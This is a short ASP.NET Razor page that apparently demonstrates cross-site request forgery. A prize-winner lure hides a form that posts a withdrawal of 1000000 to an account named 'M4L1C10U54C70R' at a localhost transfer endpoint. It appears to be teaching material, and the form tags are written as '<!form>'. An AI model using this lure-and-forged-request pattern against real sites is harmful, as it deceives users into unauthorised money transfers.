@page
@model IndexModel
@{
    ViewData["Title"] = "Home page";
}
<h1>Congratulations! You're a Winner!</h1>
<!form action="https://localhost:5001/transfer" method="post">
    <input type="hidden" name="Send" value="withdraw" />
    <input type="hidden" name="Amount" value="1000000" />
    <input type="hidden" name="Account" value="M4L1C10U54C70R" />
    <input type="submit" value="Click to collect your prize!" />
</!form>